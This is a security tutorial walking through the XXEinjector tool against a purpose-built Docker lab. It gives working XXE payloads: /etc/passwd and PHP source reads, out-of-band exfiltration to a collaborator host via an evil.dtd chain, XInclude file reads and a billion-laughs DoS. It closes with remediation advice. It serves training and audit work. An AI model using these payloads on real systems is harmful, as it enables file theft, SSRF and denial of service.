XXEinjector Tutorial: Exploit a Vulnerable XML Parser

This is the walkthrough I wish I had when I first reached for XXEinjector. We start from a fresh state, point the Ruby tool at a vulnerable XML endpoint, and walk every primitive the tool exposes: in-band file read, PHP filter source disclosure, blind out-of-band exfil, plus the manual XInclude and billion-laughs payloads that sit outside XXEinjector's wheelhouse but belong in the same article. Every step is reproducible against a small Docker lab I publish for this exact purpose.

If you have not read the XML External Entity deep dive yet, do that first; this article assumes the parser flags and the entity grammar are familiar. The XXEinjector cheat sheet is the flag-by-flag reference that complements this walkthrough, and the best XXE tools list for 2026 covers where XXEinjector sits relative to manual curl and the Burp extensions.

A note on the output you will see. Every example below was produced against techearl-labs/xml-external-entity/xxe-basic on the pinned PHP 8.2 + libxml 2.9.14 image. The endpoints, parser configuration, and the failure modes are deterministic and will match what you get locally. A few outputs are environment-dependent and will differ in minor ways: the IP address the collaborator logs for the lab container (a Docker bridge address, e.g. 172.27.0.3), the exact /etc/passwd contents inside the PHP container (whatever the base image ships), XXEinjector's own log timestamps, and the path it writes the captured loot to under Logs/. Those are illustrative, the structure underneath is what to follow.

The lab target

Pull and run the lab:

bash

git clone https://github.com/ishankaru/techearl-labs.git
cd techearl-labs
docker compose up xxe-basic

The target listens on http://localhost:8086. There are two endpoints, both backed by the same unsafe parser (LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA, plus an explicit $dom->xinclude() call):

Endpoint	Method	Behaviour
`/import.php`	POST	Parses the XML body, echoes every `<name>` element back into the HTML response. In-band XXE, XInclude, and the billion-laughs mitigation all live here.
`/upload-blind.php`	POST	Same parser, response hard-wired to `OK` or `Error`. No content reflects back. This is the realistic shape of a backend XML processor.

A second container, xxe-basic-collab, runs a tiny Python HTTP server on the Docker network. It has no published port (only the sibling lab container can reach it) and logs every incoming request line to stdout. Tail it in a second terminal before starting:

bash

docker compose logs -f xxe-basic-collab

That log is the side channel for every blind exfil attempt in this article. If you do not see lines appear there, the attack did not fire.

Step 1: install XXEinjector

XXEinjector is a single Ruby script. Either clone the repo or grab the file:

bash

git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector
ruby XXEinjector.rb --help

The tool needs a recent Ruby (2.7+ is fine, anything in the 3.x range works). If --help prints, you are done. No gems, no virtualenv.

Step 2: build the request template

XXEinjector works from a captured HTTP request with an XXEINJECT marker where it should splice each payload. Save the file as req.txt:

code

POST /import.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0

XXEINJECT

Content-Length: 0 is fine; XXEinjector recalculates it for every request before sending. The marker has to be on its own line, in the body, exactly XXEINJECT. No surrounding XML scaffolding (the tool builds that for you).

For the blind endpoint you build a second template, identical apart from the path:

code

POST /upload-blind.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0

XXEINJECT

Save that as req-blind.txt. Both files sit next to where you run the tool.

Step 3: classic in-band file read

The in-band primitive is the one XXEinjector was originally written for: declare an external entity, reference it where the application echoes content back, and let the response do the exfil. The lab's /import.php is exactly that shape.

bash

ruby XXEinjector.rb \
  --host=127.0.0.1 \
  --file=req.txt \
  --path=/etc/passwd \
  --direct=YES \
  --verbose

What each flag does:

--host=127.0.0.1 is the address of the attacker's listener. We are not using the listener for this scenario (this is in-band), but XXEinjector requires the flag.
--file=req.txt is the request template from Step 2.
--path=/etc/passwd is the file on the target's filesystem to read.
--direct=YES tells the tool to use a direct entity reference (<!ENTITY xxe SYSTEM "file://...">) rather than the parameter-entity OOB chain (covered in Step 6, and broken on this libxml).
--verbose prints the payload it sends and the response it gets, which is the only way to learn how the tool reasons.

Output (abbreviated):

code

[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

[+] Got response. Looking for file in response...
[+] File found:
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
[+] Saved to: Logs/127.0.0.1/_etc_passwd

XXEinjector finds the echoed bytes in the response body, slices them out, writes them to Logs/<host>/<sanitised-path>, and prints them inline when --verbose is on. The file is on your disk now.

A useful sanity check before troubleshooting: confirm the lab echoes <name> content by hand:

bash

curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<bookmarks>
  <bookmark><name>&xxe;</name><url>http://x</url></bookmark>
</bookmarks>
XML

If the response contains the container's hostname inside a <strong>, the in-band primitive works and XXEinjector should succeed. If it does not, fix the manual case before re-running the tool.

Step 4: PHP filter source disclosure

file:// reads files as bytes. That is fine for plain-text files but PHP source code never reaches you intact: the engine executes it before the filesystem layer ever sees the read, so a file:///var/www/html/import.php request comes back as the rendered HTML, not the source. The classic trick is to wrap the path in php://filter/convert.base64-encode/, which routes the read through PHP's stream filter machinery and hands the parser base64 bytes instead of executed output.

XXEinjector has a built-in shortcut for exactly this:

bash

ruby XXEinjector.rb \
  --host=127.0.0.1 \
  --file=req.txt \
  --path=/var/www/html/import.php \
  --direct=YES \
  --phpfilter \
  --verbose

--phpfilter rewrites the entity URL from file:///var/www/html/import.php to php://filter/convert.base64-encode/resource=/var/www/html/import.php. The lab echoes the base64 blob back inside a <strong> tag, XXEinjector grabs it, decodes, and writes the actual PHP source.

Output (abbreviated):

code

[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM
  "php://filter/convert.base64-encode/resource=/var/www/html/import.php">]>
<foo>&xxe;</foo>

[+] Got response. Looking for file in response...
[+] Base64-decoded and saved to: Logs/127.0.0.1/_var_www_html_import.php

cat the file and you get the PHP source of the endpoint you just exploited. In a real engagement this is where you walk the codebase off the box looking for credentials, config files, second-order vulnerabilities, and any other entrypoints the same parser handles. The shortlist is application-specific; wp-config.php, .env, framework bootstrap files, anything in the application's config/ directory.

Step 5: blind out-of-band exfil with a direct external entity

/upload-blind.php returns OK either way, so the in-band approach above will never work there. The realistic primitive is to make libxml issue an outbound HTTP request when it resolves an entity, encode the bit you care about into the URL, and read it out of the collaborator log.

XXEinjector has a built-in HTTP listener (--oob=http) but the only port the lab container can reach is the collaborator's port 80 inside the Docker network. Easier to use what is already there:

bash

ruby XXEinjector.rb \
  --host=xxe-basic-collab \
  --file=req-blind.txt \
  --oob=http \
  --direct=YES \
  --path=/etc/hostname \
  --verbose

--host=xxe-basic-collab tells XXEinjector to point the SYSTEM URL at the collaborator hostname (which the lab container resolves over the Docker bridge). --oob=http selects the HTTP OOB mode, --direct=YES keeps the entity declaration inline rather than chaining through an external DTD.

In practice, since we are not letting XXEinjector be its own listener, the cleanest demo is to drive the payload manually with curl and watch the collaborator log. XXEinjector's value here is that the same shape generalises across hosts:

bash

curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/upload-blind.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>
XML

Response from the lab: OK. Response in the collaborator tail:

code

[collab] GET from 172.27.0.3 path=/?leak=fired

The OOB primitive fires. The endpoint reflected nothing, but the parser still made an outbound HTTP request when it resolved &exfil;, and the collaborator received it. Anything you can put into that query string (a static token, a per-victim id, a hostname) lands in the log.

Step 6: why the textbook recursive-PE chain fails here

Every classic XXE write-up demonstrates blind file-content exfil with a recursive parameter-entity chain in an external DTD. XXEinjector implements exactly this pattern when you drop --direct=YES and let it host its own evil.dtd:

bash

ruby XXEinjector.rb \
  --host=xxe-basic-collab \
  --file=req-blind.txt \
  --oob=http \
  --path=/etc/passwd \
  --verbose

The payload XXEinjector builds is shaped like:

xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
  %remote;
]>
<foo>x</foo>

evil.dtd declares a parameter entity %file that reads /etc/passwd, an %eval that defines %exfil whose SYSTEM URL embeds %file; in the query string, then forces %exfil; to resolve so the file contents leave in the outbound URL.

Against the lab's libxml 2.9.14 the chain does not fire end-to-end. What you will see in the collaborator log:

code

[collab] GET from 172.27.0.3 path=/evil.dtd

One line. The external DTD loads. The second-stage %exfil; GET that should carry the file contents never appears. libxml has tightened parameter-entity processing across the 2.9.x series and now refuses to define a new entity inside the expansion of another entity loaded from an external DTD, which is the exact mechanic the recursive-PE pattern depends on. This is current 2026 behaviour on a stock PHP 8.2 image, not a quirk of one Docker tag.

What that means for XXEinjector specifically:

The OOB primitive in Step 5 still works. The parser does issue outbound requests for direct external entities.
The recursive-PE file-content exfil that XXEinjector defaults to does not work against this parser version. You will see the initial DTD fetch and nothing else.
The tool has no built-in fallback. It waits, decides nothing came back, and exits without loot.

This is not a bug in XXEinjector; it is libxml hardening eroding the technique the tool was designed around. On older parsers (anything before the 2.9.11-ish window where the PE restrictions tightened), and on differently-configured parsers (Java with XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES=true and no extra hardening, .NET pre-4.5.2, Python lxml with resolve_entities=True, Go encoding/xml configured to load external DTDs), the recursive-PE chain still works exactly the way XXEinjector expects. Test the chain manually against the target before assuming the tool is broken; if the initial DTD fetch hits your collaborator and nothing else does, you are looking at the same libxml ceiling. The blind XXE OOB techniques article walks the parser-by-parser matrix.

Step 7: XInclude (no DOCTYPE, no entity declaration)

XInclude is a separate libxml feature, opt-in, and entirely independent of entity processing. The lab calls $dom->xinclude() on the parsed document, which expands <xi:include> nodes in place. XXEinjector does not generate XInclude payloads (it is an entity-focused tool), so this step is manual curl:

bash

curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<bookmarks xmlns:xi="http://www.w3.org/2001/XInclude">
  <bookmark>
    <name><xi:include href="file:///etc/hostname" parse="text"/></name>
    <url>http://x</url>
  </bookmark>
</bookmarks>
XML

The response includes the container's hostname inside the <strong> of the bookmark. No DOCTYPE, no <!ENTITY> declaration. The XInclude path is often missed by audits that only grep for inline DTDs, and disabling external entities does not disable XInclude. The XInclude attacks article covers the other half of the surface (recursive includes, intra-document includes that surface authentication cookies, the difference between parse="xml" and parse="text").

Step 8: billion laughs (the default mitigation in action)

The classic entity-expansion DoS, included here to show what the default libxml configuration actually catches. POST the nested payload at /import.php:

bash

curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<bookmarks>
  <bookmark><name>&lol6;</name><url>http://x</url></bookmark>
</bookmarks>
XML

Response: XML parse error with a libxml diagnostic about the entity-expansion limit. Container CPU and memory stay flat. The lab demonstrates the attack and the default mitigation that already blocks it: libxml refuses to expand the document past its built-in limit. Passing LIBXML_PARSEHUGE to loadXML would disable that limit; the lab does not pass it, which is also why a real-world audit should grep for LIBXML_PARSEHUGE and LIBXML_NOENT together. The billion laughs attack article covers the variants (quadratic blowup, external-entity-based amplification) that get around expansion counters which only look at internal entity references.

Step 9: session and re-runs

XXEinjector writes everything it captures to Logs/<host>/. Re-running with the same --path overwrites the existing log entry; re-running with a different --path adds a new file. The tool has no session cache the way sqlmap does, so every run re-sends the full request, which is fine for XXE (a single round trip per file) but worth noting if you script bulk extraction across many paths.

For bulk reads, XXEinjector's --enumports and --brute=/path/to/wordlist flags loop over destinations using the same payload shape. Useful when you have one entity primitive and you want to walk a known config-file list.

What I would do next on this target

In a real engagement after Step 5 the report writes itself:

Confirm in-band XXE on /import.php, multiple file-read primitives available (file://, php://filter).
Confirm PHP source disclosure via php://filter/convert.base64-encode/ on every file the application user can read.
Confirm blind OOB on /upload-blind.php via direct external entity (SSRF primitive: outbound HTTP from the application container to anywhere libxml can reach).
Confirm XInclude on /import.php as an alternative file-read path independent of entity hardening.
Note that the textbook recursive-PE file-content exfil does not fire against this parser version (libxml 2.9.14), but the OOB primitive remains.
Recommend: pass LIBXML_NONET (block network resolution) and never set LIBXML_NOENT, disable XInclude (do not call $dom->xinclude()), reject any XML body containing a DOCTYPE declaration at the application layer, run the XML processor with no outbound network access from its container.

The point of this walkthrough is the chain. Each primitive on its own looks small; the cumulative chain (file read, source disclosure, outbound SSRF, XInclude as the second-path file read) is what XXE means in practice for a real audit.

Where to go next

The XXEinjector cheat sheet for the full flag reference.
The XML External Entity deep dive for the parser-by-parser matrix and the defence playbook.
The blind XXE OOB techniques for the parser-version differences that decide whether the recursive-PE chain fires.
The XInclude attacks for the independent attack surface that hardening external entities does not close.
The billion laughs attack for the entity-expansion DoS variants.
The best XXE tools list for 2026 for where XXEinjector sits relative to manual curl, Burp's XXE extension, and the newer scanners.

For the in-band primitive (direct external entity, response reflects the content), yes, on any parser configured the way the lab is. For the blind out-of-band recursive parameter-entity chain that the tool defaults to, it depends entirely on the parser version. Current libxml (the parser PHP and many Linux distros ship) refuses the second-stage entity definition the chain relies on, so the chain fires the first DTD fetch and stops. Older parsers, and parsers in other ecosystems with permissive defaults, still work the textbook way. Test the chain by hand with curl plus a collaborator before assuming the tool is broken.

XXEinjector splices the payload into a captured HTTP request so the cookies, custom headers, content type, and target path are preserved verbatim. Real XML endpoints sit behind auth, CSRF tokens, tenant routing, and content negotiation; rebuilding all of that from command-line flags is fragile. The request template makes the tool work against arbitrary endpoints without per-target plumbing. The XXEINJECT marker is the only thing the tool has to know about the body.

In-band means the application echoes parsed content back into its own HTTP response, so the entity body lands in the response you can read. Blind means the response is fixed (OK or Error) and the data has to leave the parser through a side channel, which in XXE almost always means an outbound HTTP or FTP request to a server you control. The collaborator log is the side channel. In-band is faster, blind is more realistic for backend XML processors that accept a document and return a status code.

Sometimes. If the application echoes parsed content (in-band), you do not need outbound network at all, the response carries the data. If the application does not echo (blind), and the parser also cannot make outbound requests, the residual attack surface is local-only: error-message exfil if the parser surfaces libxml errors verbatim, denial of service via entity expansion (if not capped), and XInclude file read (if enabled and the included content reaches a response anywhere). A fully sandboxed parser with no echo and no XInclude is genuinely close to safe.

XXEinjector Tutorial: Exploiting a Vulnerable App End to End

The lab target

Step 1: install XXEinjector

Step 2: build the request template

Step 3: classic in-band file read

Step 4: PHP filter source disclosure

Step 5: blind out-of-band exfil with a direct external entity

Step 6: why the textbook recursive-PE chain fails here

Step 7: XInclude (no DOCTYPE, no entity declaration)

Step 8: billion laughs (the default mitigation in action)

Step 9: session and re-runs

What I would do next on this target

Where to go next

Sources

Ishan Karunaratne

Related posts

fuxploider Tutorial: Exploiting a Vulnerable App End to End

commix Tutorial: Exploiting a Vulnerable App End to End

Dalfox Tutorial: Exploiting a Vulnerable App End to End

Does XXEinjector still work in 2026?

Why does the tool need a request file when XML attacks are stateless?

What is the difference between the in-band and blind primitives, in practice?

Can I exploit XXE with no outbound network from the target?

Sources

Ishan Karunaratne